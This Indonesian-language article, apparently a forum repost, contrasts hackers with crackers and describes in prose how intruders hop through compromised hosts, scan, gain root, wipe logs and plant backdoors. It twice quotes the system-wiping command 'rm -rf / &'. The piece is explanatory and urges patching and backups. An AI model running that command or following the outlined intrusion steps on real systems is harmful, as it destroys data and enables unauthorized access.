Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan – mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.

Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik – jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut – karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org/, http://www.rootshell.com/, http://www.linuxfirewall.org/, http://www.linuxdoc.org/, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.

Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org/, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini – tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id/.

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.

Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk/. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 – karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.

Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.

Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).

Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.

Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls ’ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn ’, dan (5) mem-finger user di mesin-mesin eksternal lainnya.

Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.

Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.

Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).

Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ‘clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.

Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.

Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm -rf / &’.

Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.

Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak – bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.

Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.

Postingan di ambil dari Forum Diskusi Hacker Liar Facebook.
 

HACKER LIAR © 2010 Designed by Yuril